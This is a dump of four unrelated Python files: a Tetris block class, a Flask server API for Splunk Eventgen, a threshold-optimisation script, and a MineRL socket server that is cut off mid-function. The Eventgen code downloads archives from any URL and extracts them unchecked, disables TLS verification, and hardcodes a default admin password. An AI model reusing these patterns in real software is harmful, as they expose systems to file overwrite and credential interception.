JBlock.py
|
import time
import threading
import config
from config import *
class JBlock:
def __init__(self):
self.cells = 4 # Number of cells occupied by the block
config.block_count += 1
config.item_id["blocks"][f"{config.block_count}"] = {} # Add a new key to dictionary to add block IDs
for n in range(self.cells - 1):
# Loop draws the bottom cells of the block on the top of the board
# Generate an ID for each cell occupied by the block
config.item_id["blocks"][f"{config.block_count}"][f"{n}"] = dpg.generate_uuid()
# Make a list of the initial cells occupied by the blocks
config.cells_occupied.append([3 + n, 18])
# Draw the cell
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[3 + n, 19], pmax=[4 + n, 18],
parent=item_id["windows"]["tetris_board"],
id=config.item_id["blocks"][f"{config.block_count}"][f"{n}"])
# Draw the final cell on the top
# Generate an ID for the top cell occupied by the block
config.item_id["blocks"][f"{config.block_count}"]["3"] = dpg.generate_uuid()
# Add point to cells_occupied list
config.cells_occupied.append([3, 19])
# Draw the cell
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[3, 20], pmax=[4, 19],
parent=item_id["windows"]["tetris_board"],
id=config.item_id["blocks"][f"{config.block_count}"]["3"])
# Update statistics
# Take the value shown, add 1 and set value
dpg.configure_item(item=item_id["displays"]["J_block_stat"],
text=int(dpg.get_item_configuration(item=item_id["displays"]["J_block_stat"])["text"]) + 1)
dpg.set_value(item=item_id["displays"]["Total_block_stat"],
value=int(dpg.get_value(item=item_id["displays"]["Total_block_stat"])) + 1)
def move_blockDispatcher(self):
# Function creates a new thread that controls the continuous movement of the new blocks
move_block_thread = threading.Thread(name="move block", target=self.move_block, args=(), daemon=True)
move_block_thread.start()
def move_block(self):
# Function controls the continuous downward movement of the blocks
config.block_moving_flag = 2 # Set to 2=JBlock. Block is moving
while True:
for n in range(self.cells):
config.cells_occupied[-1 - n][1] -= 1 # Shift the Y Coordinate down by 1 unit
if any(item in config.cells_occupied[-self.cells:] for item in config.cell_boundary) or \
any(item in config.cells_occupied[-self.cells:] for item in config.cells_occupied[:-self.cells]):
# Check if any cells have touched the wall or other blocks. If so, stop the movement
for n in range(self.cells):
config.cells_occupied[-1 - n][1] += 1 # Reset the Y coordinate
config.block_moving_flag = 0 # Block has stopped moving
return
for n in range(self.cells):
# Draw after all cells are updated
dpg.configure_item(item=config.item_id["blocks"][f"{config.block_count}"][f"{n}"],
pmin=[config.cells_occupied[-1 - n][0], config.cells_occupied[-1 - n][1] + 1],
pmax=[config.cells_occupied[-1 - n][0] + 1, config.cells_occupied[-1 - n][1]])
time.sleep(config.speed) # Wait at each cell
def draw_next_JBlock():
for n in range(3):
# Loop draws the complete block on the "next" board
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[3 + n, 3], pmax=[4 + n, 2],
parent=item_id["windows"]["next_block_board"])
# Draw the final cell on the top
# Draw the cell
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[3, 4], pmax=[4, 3],
parent=item_id["windows"]["next_block_board"])
def draw_statistics_JBlock():
for n in range(3):
# Loop draws the complete block in the statistics window
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[1 + n, 1], pmax=[2 + n, 0],
parent=item_id["windows"]["statistics_window"])
# Draw the final cell on the top
# Draw the cell
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[1, 2], pmax=[2, 1],
parent=item_id["windows"]["statistics_window"])
dpg.draw_line(p1=[6.5, 1], p2=[7.5, 1], thickness=0.1, color=[168, 168, 168],
parent=item_id["windows"]["statistics_window"])
dpg.draw_text(pos=[8.5, 1.3], text="0", size=0.5, color=[168, 168, 168],
id=item_id["displays"]["J_block_stat"])
|
eventgen_server_api.py
|
import flask
from flask import Response, request
import socket
import json
import configparser
import os
import time
import zipfile
import tarfile
import glob
import shutil
import collections
import logging
import requests
import threading
from splunk_eventgen.eventgen_api_server import eventgen_core_object
INTERNAL_ERROR_RESPONSE = json.dumps({"message": "Internal Error Occurred"})
FILE_PATH = os.path.dirname(os.path.realpath(__file__))
DEFAULT_PATH = os.path.realpath(os.path.join(FILE_PATH, "..", "default"))
SAMPLE_DIR_PATH = os.path.realpath(os.path.join(FILE_PATH, "..", "serverSamples"))
class EventgenServerAPI:
def __init__(self, eventgen, redis_connector, host, mode='standalone'):
self.bp = self._create_blueprint()
self.eventgen = eventgen
self.logger = logging.getLogger('eventgen_server')
self.logger.info("Initialized the EventgenServerAPI Blueprint")
self.total_volume = 0.0
self.host = host
self.interval = 0.01
self.mode = mode
if self.mode != 'standalone':
self.redis_connector = redis_connector
self._channel_listener()
self.logger.info("Initialized the channel listener. Cluster mode ready.")
def get_blueprint(self):
return self.bp
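# Illustrative usage sketch (not part of the original source): the blueprint
# returned here is meant to be registered on a Flask application, which then
# exposes the /index, /status, /conf, /volume, /start, /stop, /restart, /reset,
# /bundle, /setup and /healthcheck routes defined in _create_blueprint below.
# Assuming `server_api` is an EventgenServerAPI instance:
#
#   app = flask.Flask(__name__)
#   app.register_blueprint(server_api.get_blueprint())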
def _channel_listener(self):
def start_listening(self):
while True:
message = self.redis_connector.pubsub.get_message()
if message and type(message.get('data')) == bytes:
data = json.loads(message.get('data'))
self.logger.info("Message Recieved {}".format(message['data']))
if data['target'] == 'all' or data['target'] == self.host:
thread = threading.Thread(target=self._delegate_jobs, args=(data.get('job'), data.get('request_method'), data.get('body'), data.get('message_uuid')))
thread.daemon = True
thread.start()
time.sleep(self.interval)
thread = threading.Thread(target=start_listening, args=(self,))
thread.daemon = True
thread.start()
def format_message(self, job, request_method, response, message_uuid):
return json.dumps({'job': job, 'request_method': request_method, 'response': response, 'host': self.host, 'message_uuid': message_uuid})
def _delegate_jobs(self, job, request_method, body, message_uuid):
if not job: return
else:
self.logger.info("Delegated {} {} {} {}".format(job, request_method, body, message_uuid))
if job == 'status':
response = self.get_status()
message = self.format_message('status', request_method, response=response, message_uuid=message_uuid)
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, message)
elif job == 'conf':
if request_method == 'POST':
self.set_conf(body)
elif request_method == 'PUT':
self.edit_conf(body)
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('conf', request_method, response=self.get_conf(), message_uuid=message_uuid))
elif job == 'bundle':
self.set_bundle(body.get("url", ''))
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('bundle', request_method, response=self.get_conf(), message_uuid=message_uuid))
elif job == 'setup':
self.clean_bundle_conf()
self.setup_http(body)
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('setup', request_method, response=self.get_conf(), message_uuid=message_uuid))
elif job == 'volume':
if request_method == 'POST':
self.set_volume(body.get("perDayVolume", 0.0))
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('volume', request_method, response=self.get_volume(), message_uuid=message_uuid))
elif job == 'start':
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('start', request_method, response=self.start(), message_uuid=message_uuid))
elif job == 'stop':
message = {'message': 'Eventgen is stopping. Might take some time to terminate all processes.'}
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('stop', request_method, response=message, message_uuid=message_uuid))
self.stop(force_stop=True)
elif job == 'restart':
message = {'message': 'Eventgen is restarting. Might take some time to restart.'}
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('restart', request_method, response=message, message_uuid=message_uuid))
self.restart()
elif job == 'reset':
message = {'message': 'Eventgen is resetting. Might take some time to reset.'}
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('reset', request_method, response=message, message_uuid=message_uuid))
self.reset()
elif job == 'healthcheck':
response = self.healthcheck()
message = self.format_message('healthcheck', request_method, response=response, message_uuid=message_uuid)
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, message)
def _create_blueprint(self):
bp = flask.Blueprint('server_api', __name__)
@bp.route('/index', methods=['GET'])
def http_get_index():
return self.get_index()
@bp.route('/status', methods=['GET'])
def http_get_status():
try:
response = self.get_status()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/conf', methods=['GET', 'POST', 'PUT'])
def http_conf():
try:
if request.method == 'POST':
self.set_conf(request.get_json(force=True))
elif request.method == 'PUT':
self.edit_conf(request.get_json(force=True))
return Response(json.dumps(self.get_conf()), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/volume', methods=['GET'])
def http_get_volume():
try:
response = self.get_volume()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/volume', methods=['POST'])
def http_post_volume():
try:
self.set_volume(request.get_json(force=True).get("perDayVolume", 0.0))
return Response(json.dumps(self.get_volume()), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/start', methods=['POST'])
def http_post_start():
try:
response = self.start()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/stop', methods=['POST'])
def http_post_stop():
try:
force_stop = False
try:
force_stop = True
except:
force_stop = False
response = self.stop(force_stop = force_stop)
self.eventgen.refresh_eventgen_core_object()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/restart', methods=['POST'])
def http_post_restart():
try:
response = self.restart()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/reset', methods=['POST'])
def http_post_reset():
try:
response = self.reset()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/bundle', methods=['POST'])
def http_post_bundle():
try:
self.set_bundle(request.get_json(force=True).get("url", ''))
self.clean_bundle_conf()
return Response(json.dumps(self.get_conf()), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/setup', methods=['POST'])
def http_post_setup():
try:
self.stop(force_stop=True)
self.clean_bundle_conf()
self.setup_http(request.get_json(force=True))
return Response(json.dumps(self.get_conf()), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/healthcheck', methods=['GET'])
def http_get_healthcheck():
try:
return Response(json.dumps(self.healthcheck()), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
return bp
def get_index(self):
home_page = '''*** Eventgen WSGI ***\nHost: {0}\nEventgen Status: {1}\nEventgen Config file exists: {2}\nEventgen Config file path: {3}\nTotal volume: {4}\nWorker Queue Status: {5}\nSample Queue Status: {6}\nOutput Queue Status: {7}\n'''
status = self.get_status()
eventgen_status = "running" if status["EVENTGEN_STATUS"] else "stopped"
host = status["EVENTGEN_HOST"]
configured = status["CONFIGURED"]
config_file = status["CONFIG_FILE"]
total_volume = status["TOTAL_VOLUME"]
worker_queue_status = status["QUEUE_STATUS"]["WORKER_QUEUE"]
sample_queue_status = status["QUEUE_STATUS"]["SAMPLE_QUEUE"]
output_queue_status = status["QUEUE_STATUS"]["OUTPUT_QUEUE"]
return home_page.format(host, eventgen_status, configured, config_file, total_volume, worker_queue_status,
sample_queue_status, output_queue_status)
def get_conf(self):
response = collections.OrderedDict()
if self.eventgen.configured:
config = configparser.RawConfigParser()
config.optionxform = str
config_path = self.eventgen.configfile
if os.path.isfile(config_path):
config.read(config_path)
for section in config.sections():
response[section] = collections.OrderedDict()
for k, v in config.items(section):
response[section][k] = v
return response
def set_conf(self, request_body):
config = configparser.RawConfigParser({}, collections.OrderedDict)
config.optionxform = str
for sample in request_body.items():
config.add_section(sample[0])
for pair in sample[1].items():
value = pair[1]
if type(value) == dict:
value = json.dumps(value)
config.set(sample[0], pair[0], str(value))
with open(eventgen_core_object.CUSTOM_CONFIG_PATH, 'w+') as conf_content:
config.write(conf_content)
self.eventgen.refresh_eventgen_core_object()
def edit_conf(self, request_body):
conf_dict = self.get_conf()
for stanza, kv_pairs in request_body.items():
for key, value in kv_pairs.items():
if stanza not in conf_dict:
conf_dict[stanza] = {}
if stanza == "global" and key == "index":
for stanza, kv_pairs in conf_dict.items():
conf_dict[stanza]["index"] = value
conf_dict[stanza][key] = value
self.set_conf(conf_dict)
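# Illustrative request body for set_conf/edit_conf (the stanza name and values
# are hypothetical): a mapping of stanza names to key/value pairs, e.g.
#
#   {"windbag": {"perDayVolume": "100", "outputMode": "stdout"}}
#
# Nested dict values (such as httpeventServers) are serialized to JSON strings
# by set_conf before being written to the config file.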
def get_status(self):
response = dict()
if self.eventgen.eventgen_core_object.check_running():
status = 1 if not self.eventgen.eventgen_core_object.check_done() else 2 # 1 is running and 2 is done
else:
status = 0 # not started yet
response["EVENTGEN_STATUS"] = status
response["EVENTGEN_HOST"] = self.host
response["CONFIGURED"] = self.eventgen.configured
response["CONFIG_FILE"] = self.eventgen.configfile
response["TOTAL_VOLUME"] = self.total_volume
response["QUEUE_STATUS"] = {
'SAMPLE_QUEUE': {
'UNFINISHED_TASK': 'N/A',
'QUEUE_LENGTH': 'N/A'},
'OUTPUT_QUEUE': {
'UNFINISHED_TASK': 'N/A',
'QUEUE_LENGTH': 'N/A'},
'WORKER_QUEUE': {
'UNFINISHED_TASK': 'N/A',
'QUEUE_LENGTH': 'N/A'}
}
response['THROUGHPUT_STATUS'] = self.get_throughput()
if hasattr(self.eventgen.eventgen_core_object, "sampleQueue"):
response["QUEUE_STATUS"]['SAMPLE_QUEUE']['UNFINISHED_TASK'] = self.eventgen.eventgen_core_object.sampleQueue.unfinished_tasks
response["QUEUE_STATUS"]['SAMPLE_QUEUE']['QUEUE_LENGTH'] = self.eventgen.eventgen_core_object.sampleQueue.qsize()
if hasattr(self.eventgen.eventgen_core_object, "outputQueue"):
try:
response["QUEUE_STATUS"]['OUTPUT_QUEUE']['UNFINISHED_TASK'] = self.eventgen.eventgen_core_object.outputQueue.unfinished_tasks
except:
response["QUEUE_STATUS"]['OUTPUT_QUEUE']['UNFINISHED_TASK'] = "N/A"
try:
response["QUEUE_STATUS"]['OUTPUT_QUEUE']['QUEUE_LENGTH'] = self.eventgen.eventgen_core_object.outputQueue.qsize()
except:
response["QUEUE_STATUS"]['OUTPUT_QUEUE']['QUEUE_LENGTH'] = "N/A"
if hasattr(self.eventgen.eventgen_core_object, "workerQueue"):
try:
response["QUEUE_STATUS"]['WORKER_QUEUE']['UNFINISHED_TASK'] = self.eventgen.eventgen_core_object.workerQueue.unfinished_tasks
except:
response["QUEUE_STATUS"]['WORKER_QUEUE']['UNFINISHED_TASK'] = "N/A"
try:
response["QUEUE_STATUS"]['WORKER_QUEUE']['QUEUE_LENGTH'] = self.eventgen.eventgen_core_object.workerQueue.qsize()
except:
response["QUEUE_STATUS"]['WORKER_QUEUE']['QUEUE_LENGTH'] = "N/A"
return response
def get_throughput(self):
empty_throughput = {'TOTAL_VOLUME_MB': 0, 'TOTAL_COUNT': 0, 'THROUGHPUT_VOLUME_KB': 0, 'THROUGHPUT_COUNT': 0}
if hasattr(self.eventgen.eventgen_core_object, 'output_counters'):
total_volume = 0
total_count = 0
throughput_volume = 0
throughput_count = 0
for output_counter in self.eventgen.eventgen_core_object.output_counters:
total_volume += output_counter.total_output_volume
total_count += output_counter.total_output_count
throughput_volume += output_counter.throughput_volume
throughput_count += output_counter.throughput_count
return {
'TOTAL_VOLUME_MB': total_volume / (1024 * 1024),
'TOTAL_COUNT': total_count,
'THROUGHPUT_VOLUME_KB': throughput_volume / (1024),
'THROUGHPUT_COUNT': throughput_count}
else:
return empty_throughput
def get_volume(self):
response = dict()
config = self.get_conf()
total_volume = 0.0
volume_distribution = {}
for stanza in list(config.keys()):
if isinstance(config[stanza], dict) and "perDayVolume" in list(config[stanza].keys()):
total_volume += float(config[stanza]["perDayVolume"])
volume_distribution[stanza] = float(config[stanza]["perDayVolume"])
if total_volume:
self.total_volume = total_volume
response['perDayVolume'] = self.total_volume
response['volume_distribution'] = volume_distribution
return response
def set_volume(self, target_volume):
conf_dict = self.get_conf()
if self.get_volume()['perDayVolume'] != 0:
ratio = float(target_volume) / float(self.total_volume)
for stanza, kv_pair in conf_dict.items():
if isinstance(kv_pair, dict):
if '.*' not in stanza and "perDayVolume" in list(kv_pair.keys()):
conf_dict[stanza]["perDayVolume"] = round(float(conf_dict[stanza]["perDayVolume"]) * ratio, 2)
else:
# If no total volume exists yet, divide the target volume equally among the stanzas
stanza_num = len(list(conf_dict.keys()))
if '.*' in conf_dict:
stanza_num -= 1
if 'global' in conf_dict:
stanza_num -= 1
divided_volume = float(target_volume) / stanza_num
for stanza, kv_pair in conf_dict.items():
if isinstance(kv_pair, dict) and stanza != 'global' and '.*' not in stanza:
conf_dict[stanza]["perDayVolume"] = divided_volume
self.set_conf(conf_dict)
self.total_volume = round(float(target_volume), 2)
def start(self):
response = {}
if not self.eventgen.configured:
response['message'] = "Eventgen is not configured."
elif self.eventgen.eventgen_core_object.check_running():
response['message'] = "Eventgen already started."
else:
self.eventgen.eventgen_core_object.start(join_after_start=False)
response['message'] = "Eventgen has successfully started."
return response
def stop(self, force_stop=False):
response = {}
if self.eventgen.eventgen_core_object.check_running():
try:
self.eventgen.eventgen_core_object.stop(force_stop=force_stop)
except:
pass
response['message'] = "Eventgen is stopped."
else:
response['message'] = "There is no Eventgen process running."
return response
def restart(self):
response = {}
if self.eventgen.eventgen_core_object.check_running():
self.reset()
self.start()
response['message'] = "Eventgen has successfully restarted."
else:
self.start()
response['message'] = "Eventgen was not running. Starting Eventgen."
return response
def reset(self):
response = {}
self.stop(force_stop=True)
time.sleep(0.1)
self.eventgen.refresh_eventgen_core_object()
self.get_volume()
response['message'] = "Eventgen has been reset."
return response
def healthcheck(self):
response = {}
if self.mode != 'standalone':
try:
self.redis_connector.pubsub.check_health()
response['message'] = "Connections are healthy"
except Exception as e:
self.logger.error("Connection to Redis failed: {}, re-registering".format(str(e)))
self.redis_connector.register_myself(hostname=self.host, role="server")
response['message'] = "Connections unhealthy - re-established connections"
else:
response['message'] = "Standalone {} is healthy".format(self.host)
return response
def set_bundle(self, url):
if not url:
return
bundle_dir = self.unarchive_bundle(self.download_bundle(url))
if os.path.isdir(os.path.join(bundle_dir, "samples")):
if not os.path.exists(SAMPLE_DIR_PATH):
os.makedirs(SAMPLE_DIR_PATH)
for file in glob.glob(os.path.join(bundle_dir, "samples", "*")):
shutil.copy(file, SAMPLE_DIR_PATH)
self.logger.info("Copied all samples to the sample directory.")
if os.path.isfile(os.path.join(bundle_dir, "default", "eventgen.conf")):
self.eventgen.configured = False
config = configparser.RawConfigParser()
config.optionxform = str
config.read(os.path.join(bundle_dir, "default", "eventgen.conf"))
config_dict = {s: collections.OrderedDict(config.items(s)) for s in config.sections()}
self.set_conf(config_dict)
self.eventgen.configured = True
self.logger.info("Configured Eventgen with the downloaded bundle.")
def download_bundle(self, url):
bundle_path = os.path.join(DEFAULT_PATH, "eg-bundle.tgz")
try:
os.remove(bundle_path)
shutil.rmtree(os.path.join(os.path.dirname(bundle_path), 'eg-bundle'))
except:
pass
r = requests.get(url, stream=True)
with open(bundle_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=None):
if chunk:
f.write(chunk)
r.close()
self.logger.info("Downloaded bundle to the path {}".format(bundle_path))
return bundle_path
def unarchive_bundle(self, path):
output = ''
if tarfile.is_tarfile(path):
tar = tarfile.open(path)
foldername = ''
for name in tar.getnames():
if '/' not in name:
foldername = name
break
output = os.path.join(os.path.dirname(path), os.path.commonprefix(tar.getnames()))
tar.extractall(path=os.path.dirname(path))
tar.close()
if foldername:
os.rename(os.path.join(os.path.dirname(path), foldername), os.path.join(os.path.dirname(path), 'eg-bundle'))
output = os.path.join(os.path.dirname(path), 'eg-bundle')
elif zipfile.is_zipfile(path):
zipf = zipfile.ZipFile(path)
for info in zipf.infolist():
old_file_name = info.filename
info.filename = "eg-bundle/" + info.filename
zipf.extract(info, os.path.dirname(path))
output = os.path.join(os.path.dirname(path), 'eg-bundle')
zipf.close()
else:
msg = "Unknown archive format!"
raise Exception(msg)
self.logger.info("Unarchived bundle to the path {}".format(path))
return output
def clean_bundle_conf(self):
conf_dict = self.get_conf()
if ".*" not in conf_dict:
conf_dict['.*'] = {}
# 1. Remove sampleDir from individual stanza and set a global sampleDir
# 2. Change token sample path to a local sample path
for stanza, kv_pair in conf_dict.items():
if stanza != ".*":
if 'sampleDir' in kv_pair:
del kv_pair['sampleDir']
for key, value in kv_pair.items():
if 'replacementType' in key and value in ['file', 'mvfile', 'seqfile']:
token_num = key[key.find('.')+1:key.rfind('.')]
if not token_num: continue
else:
existing_path = kv_pair['token.{}.replacement'.format(token_num)]
kv_pair['token.{}.replacement'.format(token_num)] = os.path.join(SAMPLE_DIR_PATH, existing_path[existing_path.rfind('/')+1:])
conf_dict['.*']['sampleDir'] = SAMPLE_DIR_PATH
self.set_conf(conf_dict)
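# Illustrative example of the rewrite performed by clean_bundle_conf (paths are
# hypothetical): a bundle stanza containing
#
#   sampleDir = /opt/bundle/samples
#   token.0.replacementType = file
#   token.0.replacement = /opt/bundle/samples/users.sample
#
# loses its per-stanza sampleDir (a global sampleDir pointing at SAMPLE_DIR_PATH
# is set on the ".*" stanza instead), and the token replacement path is rewritten
# to <SAMPLE_DIR_PATH>/users.sample.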
def setup_http(self, data):
if data.get("servers"):
conf_dict = self.get_conf()
if 'global' not in conf_dict:
conf_dict['global'] = {}
for stanza, kv_pair in conf_dict.items():
if 'outputMode' in kv_pair:
del kv_pair['outputMode']
if 'httpeventServers' in kv_pair:
del kv_pair['httpeventServers']
conf_dict['global']['threading'] = 'process'
conf_dict['global']['httpeventMaxPayloadSize'] = '256000'
conf_dict['global']['outputMode'] = 'httpevent'
conf_dict['global']['httpeventServers'] = {"servers": data.get("servers")}
self.set_conf(conf_dict)
else:
# If hec_servers information doesn't exist, do service discovery
mode = data.get("mode", "roundrobin")
hostname_template = data.get("hostname_template", "idx{0}")
hosts = data.get("other_hosts", [])
protocol = data.get("protocol", "https")
key = data.get("key", "00000000-0000-0000-0000-000000000000")
key_name = data.get("key_name", "eventgen") + '_' + self.host
password = data.get("password", "Chang3d!")
hec_port = int(data.get("hec_port", 8088))
mgmt_port = int(data.get("mgmt_port", 8089))
new_key = bool(data.get("new_key", True))
def create_new_hec_key(hostname):
requests.post(
"https://{0}:{1}/servicesNS/admin/splunk_httpinput/data/inputs/http/http".format(
hostname, mgmt_port), auth=("admin", password), data={"disabled": "0"}, verify=False)
requests.delete(
"https://{0}:{1}/servicesNS/admin/splunk_httpinput/data/inputs/http/{2}".format(
hostname, mgmt_port, key_name), verify=False, auth=("admin", password))
requests.post(
"https://{0}:{1}/servicesNS/admin/splunk_httpinput/data/inputs/http?output_mode=json".format(
hostname, mgmt_port), verify=False, auth=("admin", password), data={"name": key_name})
r = requests.post(
"https://{0}:{1}/servicesNS/admin/splunk_httpinput/data/inputs/http/{2}?output_mode=json".format(
hostname, mgmt_port, key_name), verify=False, auth=("admin", password))
return str(json.loads(r.text)["entry"][0]["content"]["token"])
self.discovered_servers = []
for host in hosts:
try:
formatted_hostname = socket.gethostbyname(host)
if new_key:
key = create_new_hec_key(formatted_hostname)
except (socket.gaierror, requests.ConnectionError):
self.logger.warning('failed to reach %s, skip...' % host)
continue
except (ValueError, KeyError):
self.logger.warning('failed to setup hec token for %s, skip...' % host)
continue
self.discovered_servers.append({"protocol": str(protocol), "address": str(formatted_hostname), "port": str(hec_port), "key": str(key)})
counter = 1
while True:
try:
formatted_hostname = socket.gethostbyname(hostname_template.format(counter))
if new_key:
key = create_new_hec_key(formatted_hostname)
self.discovered_servers.append({
"protocol": str(protocol), "address": str(formatted_hostname), "port": str(hec_port), "key":
str(key)})
counter += 1
except socket.gaierror:
break
conf_dict = self.get_conf()
if 'global' not in conf_dict:
conf_dict['global'] = {}
for stanza, kv_pair in conf_dict.items():
if 'outputMode' in kv_pair:
del kv_pair['outputMode']
if 'httpeventServers' in kv_pair:
del kv_pair['httpeventServers']
conf_dict['global']['threading'] = 'process'
conf_dict['global']['httpeventMaxPayloadSize'] = '256000'
conf_dict['global']['outputMode'] = 'httpevent'
conf_dict['global']['httpeventServers'] = {"servers": self.discovered_servers}
self.set_conf(conf_dict)
|
optimize_threshold.py
|
import EncoderFactory
from DatasetManager import DatasetManager
import pandas as pd
import numpy as np
from sklearn.metrics import roc_auc_score
from sklearn.pipeline import FeatureUnion
import time
import os
import sys
from sys import argv
import pickle
import csv
from hyperopt import Trials, STATUS_OK, tpe, fmin, hp
import hyperopt
from multiprocessing import Process as Process
def calculate_cost(x, costs):
return costs[int(x['prediction']), int(x['actual'])](x)
def evaluate_model_cost(args):
conf_threshold = args['conf_threshold']
c_miss= args['c_miss']
c_action = args['c_action']
c_com = args['c_com']
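# The cost matrix below is indexed as costs[prediction, actual] by
# calculate_cost. Interpreting the weight names (an assumption based on their
# identifiers):
#   costs[0, 0] - predicted negative, actual negative: no cost
#   costs[0, 1] - predicted negative, actual positive: full miss cost c_miss
#   costs[1, 0] - predicted positive, actual negative: alarm cost c_action + c_com
#   costs[1, 1] - predicted positive, actual positive: alarm cost plus a residual
#                 miss cost that grows the later in the case the alarm is raised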
costs = np.matrix([[lambda x: 0,
lambda x: c_miss],
[lambda x: c_action + c_com, # 0:1
lambda x: c_action + (x['prefix_nr'] - 1) / x['case_length'] * c_miss
]])
# trigger alarms according to conf_threshold
dt_final = pd.DataFrame()
unprocessed_case_ids = set(dt_preds.case_id.unique())
for nr_events in range(1, dt_preds.prefix_nr.max() + 1):
tmp = dt_preds[(dt_preds.case_id.isin(unprocessed_case_ids)) & (dt_preds.prefix_nr == nr_events)]
tmp = tmp[tmp.predicted_proba >= conf_threshold]
tmp["prediction"] = 1
dt_final = pd.concat([dt_final, tmp], axis=0)
unprocessed_case_ids = unprocessed_case_ids.difference(tmp.case_id)
tmp = dt_preds[(dt_preds.case_id.isin(unprocessed_case_ids)) & (dt_preds.prefix_nr == 1)]
tmp["prediction"] = 0
dt_final = pd.concat([dt_final, tmp], axis=0)
case_lengths = dt_preds.groupby("case_id").prefix_nr.max().reset_index()
case_lengths.columns = ["case_id", "case_length"]
dt_final = dt_final.merge(case_lengths)
cost = dt_final.apply(calculate_cost, costs=costs, axis=1).sum()
return {'loss': cost, 'status': STATUS_OK, 'model': dt_final}
def run_experiment(c_miss_weight,c_action_weight):
c_miss = c_miss_weight / (c_miss_weight + c_action_weight)
c_action = c_action_weight / (c_miss_weight + c_action_weight)
c_com = 2.0
space = {'conf_threshold': hp.uniform("conf_threshold", 0, 1),
'c_miss':c_miss,
'c_action':c_action,
'c_com':c_com}
trials = Trials()
best = fmin(evaluate_model_cost, space, algo=tpe.suggest, max_evals=50, trials=trials)
print(repr(best))
best_params = hyperopt.space_eval(space, best)
outfile = os.path.join(params_dir, "optimal_confs_%s_%s_%s_%s.pickle" % (
dataset_name, c_miss_weight, c_action_weight, c_postpone_weight))
print(outfile)
# write to file
with open(outfile, "wb") as fout:
pickle.dump(best_params, fout)
print('Preparing data...')
start = time.time()
dataset_name = argv[1]
preds_dir = argv[2]
params_dir = argv[3]
# create output directory
if not os.path.exists(os.path.join(params_dir)):
os.makedirs(os.path.join(params_dir))
# read the data
dataset_manager = DatasetManager(dataset_name)
# prepare the dataset
dt_preds = pd.read_csv(os.path.join(preds_dir, "preds_val_%s.csv" % dataset_name), sep=";")
print('Optimizing parameters...')
cost_weights = [(1,1), (2,1), (3,1), (5,1), (10,1), (20,1)]
c_postpone_weight = 0
processes = []
for c_miss_weight, c_action_weight in cost_weights:
p = Process(target=run_experiment,args=(c_miss_weight,c_action_weight))
p.start()
processes.append(p)
for p in processes:
p.join()
|
env_server.py
|
import socket
import sys
import traceback
import gym
import logging
import minerl
import struct
import argparse
import os
import tempfile
import fcntl
import getpass
from threading import Thread
try:
import cPickle as pickle
except ImportError:
import pickle
class EnvServer:
def __init__(self, handler, host: str = "127.0.0.1", port: int = 9999):
self.handler = handler
self.host = host
self.port = port
self.soc = None
def start_server(self):
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# SO_REUSEADDR flag tells the kernel to reuse a local socket in TIME_WAIT state,
# without waiting for its natural timeout to expire
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logging.info("Socket created")
try:
soc.bind((self.host, self.port))
except:
logging.error("Bind failed. Error : " + str(sys.exc_info()))
sys.exit()
soc.listen(5) # queue up to 5 requests
logging.info("Socket now listening")
self.soc = soc
def listen(self):
# Infinite loop - do not reset for every request
try:
while True:
connection, address = self.soc.accept()
ip, port = str(address[0]), str(address[1])
logging.info("Connected with " + ip + ":" + port)
try:
Thread(target=self.client_thread, args=(connection,)).start()
except:
logging.error("Thread did not start.")
traceback.print_exc()
finally:
self.soc.close()
def client_thread(self, connection):
is_active = True
client_address = connection.getpeername()
try:
while is_active:
client_input = receive_data(connection)
if type(client_input) is dict:
handler = client_input["type"]
if handler == "close":
send_data(connection, self.handler.message_dict[handler](client_address, client_input["data"]))
connection.close()
is_active = False
elif handler in self.handler.message_dict:
send_data(connection, self.handler.message_dict[handler](client_address, client_input["data"]))
